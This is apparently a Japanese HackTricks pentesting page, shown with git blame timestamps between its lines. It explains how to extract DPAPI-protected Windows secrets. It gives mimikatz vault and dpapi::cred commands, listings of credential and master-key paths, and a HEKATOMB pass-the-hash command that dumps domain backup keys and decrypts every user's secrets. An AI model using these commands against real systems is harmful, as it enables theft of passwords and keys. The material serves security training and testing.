2023-07-07 23:42:27 +00:00
# DPAPI - パスワードの抽出
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 20:35:28 +02:00
< summary >< a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" >< strong > ☁️ HackTricks Cloud ☁️</ strong ></ a > -< a href = "https://twitter.com/hacktricks_live" >< strong > 🐦 Twitter 🐦</ strong ></ a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" >< strong > 🎙️ Twitch 🎙️</ strong ></ a > - < a href = "https://www.youtube.com/ @hacktricks_LIVE " >< strong > 🎥 Youtube 🎥</ strong ></ a ></ summary >
2022-04-28 16:01:33 +00:00
2024-02-05 03:25:08 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新版のPEASSにアクセス**したいですか? または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs ](https://opensea.io/collection/the-peass-family )のコレクションを見つけてください
* [**公式PEASS& HackTricks swag** ](https://peass.creator-spring.com )を手に入れましょう
* **[💬 ](https://emojipedia.org/speech-balloon/ ) Discordグループ**に参加するか、[telegramグループ ](https://t.me/peass )に参加するか、**Twitter**で私をフォローするか、[**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )**をフォローしてください**
* **ハッキングトリックを共有するために、PRを**[**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください**
2022-04-28 16:01:33 +00:00
< / details >
2022-10-25 15:56:49 +00:00
< figure >< img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media& #x26 ;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" >< figcaption ></ figcaption ></ figure >
2024-02-05 03:25:08 +00:00
[**RootedCON** ](https://www.rootedcon.com/ )は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家にとっての熱い出会いの場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2023-07-07 23:42:27 +00:00
## DPAPIとは
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
Data Protection API( DPAPI) は、主にWindowsオペレーティングシステム内で**非対称プライベートキーの対称暗号化**に使用され、ユーザーまたはシステムの秘密をエントロピーの重要なソースとして活用します。このアプローチにより、開発者はユーザーのログオン秘密から派生したキーを使用してデータを暗号化できるため、開発者が暗号化キーの保護を管理する必要がなくなります。
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
### DPAPIによって保護されるデータ
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
DPAPIによって保護される個人データには、次のものがあります:
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
- Internet ExplorerおよびGoogle Chromeのパスワードおよび自動入力データ
- OutlookやWindows Mailなどのアプリケーションの電子メールおよび内部FTPアカウントのパスワード
- 共有フォルダ、リソース、無線ネットワーク、Windows Vaultのパスワード( 暗号化キーを含む)
- リモートデスクトップ接続、.NET Passport、およびさまざまな暗号化および認証目的のプライベートキーのパスワード
- Credential Managerによって管理されるネットワークパスワード、Skype、MSNメッセンジャーなどのCryptProtectDataを使用するアプリケーションの個人データ
2020-09-01 20:17:55 +00:00
2024-02-05 03:25:08 +00:00
## Vaultのリスト
2022-08-14 15:38:08 +00:00
```bash
# From cmd
vaultcmd /listcreds:"Windows Credentials" /all
# From mimikatz
mimikatz vault::list
```
2023-07-07 23:42:27 +00:00
## 資格情報ファイル
2022-08-14 15:38:08 +00:00
2024-02-05 03:25:08 +00:00
**保護された資格情報ファイル**は次の場所にある可能性があります:
2022-08-14 15:38:08 +00:00
```
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
```
2024-02-05 03:25:08 +00:00
Mimikatzの`dpapi::cred` を使用して資格情報情報を取得します。応答には、暗号化されたデータとguidMasterKeyなどの興味深い情報が含まれています。
2022-08-14 15:38:08 +00:00
```bash
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
[...]
guidMasterKey : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData : b8f619[...snip...]b493fe
[..]
```
2024-02-05 03:25:08 +00:00
あなたは適切な `/masterkey` と一緒に **mimikatz module** `dpapi::cred` を使用して復号化することができます。
2022-08-14 15:38:08 +00:00
```
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:< MASTERKEY >
```
2023-07-07 23:42:27 +00:00
## マスターキー
2022-08-14 15:38:08 +00:00
2024-02-05 03:25:08 +00:00
ユーザーのRSAキーを暗号化するために使用されるDPAPIキーは、`%APPDATA%\Microsoft\Protect\{SID}` ディレクトリに格納されています。ここで、{SID}はそのユーザーの[**セキュリティ識別子** ](https://en.wikipedia.org/wiki/Security_Identifier )です。**DPAPIキーは、ユーザーのプライベートキーを保護するマスターキーと同じファイルに格納されています**。通常、これはランダムな64バイトのデータです。( このディレクトリは保護されているため、cmdから`dir` を使用してリストすることはできませんが、PowerShellからリストできます) 。
2020-09-01 22:47:55 +00:00
```bash
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
```
2024-02-05 03:25:08 +00:00
以下はユーザーの一連のマスターキーの例です:
2020-09-01 22:47:55 +00:00
2022-12-24 12:04:26 +00:00
![](< .. / . . / . gitbook / assets / image ( 324 ) . png > )
2020-09-01 22:47:55 +00:00
2024-02-05 03:25:08 +00:00
通常、**各マスターキーは他のコンテンツを復号化できる暗号化された対称キー**です。したがって、**暗号化されたマスターキーを抽出**して、後でそれで**暗号化された他のコンテンツ**を**復号化**することが興味深いです。
2020-09-01 22:47:55 +00:00
2023-07-07 23:42:27 +00:00
### マスターキーの抽出と復号化
2020-09-01 22:47:55 +00:00
2024-02-05 03:25:08 +00:00
マスターキーを抽出して復号化する方法の例については、[https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ ](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin )を参照してください。
2020-09-01 22:47:55 +00:00
2022-10-03 22:09:31 +00:00
## SharpDPAPI
2024-02-05 03:25:08 +00:00
[SharpDPAPI ](https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1 )は、[@gentilkiwi ](https://twitter.com/gentilkiwi )の[Mimikatz ](https://github.com/gentilkiwi/mimikatz/ )プロジェクトからのDPAPI機能のC#ポートです 。
2022-10-03 22:09:31 +00:00
2022-09-18 13:34:31 +02:00
## HEKATOMB
2024-02-05 03:25:08 +00:00
[**HEKATOMB** ](https://github.com/Processus-Thief/HEKATOMB )は、LDAPディレクトリからすべてのユーザーとコンピュータを抽出し、RPCを介してドメインコントローラーバックアップキーを抽出するツールです。スクリプトはすべてのコンピュータのIPアドレスを解決し、すべてのユーザーのDPAPIブロブを取得し、ドメインバックアップキーですべてを復号化します。
2022-09-18 13:34:31 +02:00
2022-09-30 10:27:15 +00:00
`python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp`
2022-09-18 13:34:31 +02:00
2024-02-05 03:25:08 +00:00
LDAPから抽出されたコンピュータリストを使用すると、それらを事前に知らなくてもすべてのサブネットワークを見つけることができます!
2022-09-18 13:34:31 +02:00
2024-02-05 03:25:08 +00:00
"ドメイン管理者権限だけでは不十分。すべてをハックしよう。"
2022-09-18 13:34:31 +02:00
2022-08-14 15:38:08 +00:00
## DonPAPI
2021-11-07 12:15:02 +00:00
2024-02-05 03:25:08 +00:00
[**DonPAPI** ](https://github.com/login-securite/DonPAPI )は、DPAPIで保護されたシークレットを自動的にダンプできます。
2021-11-07 12:15:02 +00:00
2023-07-07 23:42:27 +00:00
## 参考文献
2020-09-01 22:47:55 +00:00
2021-10-18 11:21:18 +00:00
* [https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13 ](https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13 )
2020-09-01 22:47:55 +00:00
* [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ ](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c )
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
< figure >< img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media& #x26 ;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" >< figcaption ></ figcaption ></ figure >
2024-02-05 03:25:08 +00:00
[**RootedCON** ](https://www.rootedcon.com/ )は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野の技術とサイバーセキュリティ専門家の熱い出会いの場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 20:35:28 +02:00
< summary >< a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" >< strong > ☁️ HackTricks Cloud ☁️</ strong ></ a > -< a href = "https://twitter.com/hacktricks_live" >< strong > 🐦 Twitter 🐦</ strong ></ a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" >< strong > 🎙️ Twitch 🎙️</ strong ></ a > - < a href = "https://www.youtube.com/ @hacktricks_LIVE " >< strong > 🎥 Youtube 🎥</ strong ></ a ></ summary >
2022-04-28 16:01:33 +00:00
2024-02-05 03:25:08 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs ](https://opensea.io/collection/the-peass-family )コレクションを見つけましょう
* [**公式PEASS& HackTricksスウォッグ** ](https://peass.creator-spring.com )を手に入れましょう
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ** ](https://t.me/peass )に**参加**するか、**Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )**をフォローしてください。**
* **ハッキングトリックを共有するために**[**hacktricksリポジトリ** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloudリポジトリ** ](https://github.com/carlospolop/hacktricks-cloud ) **にPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >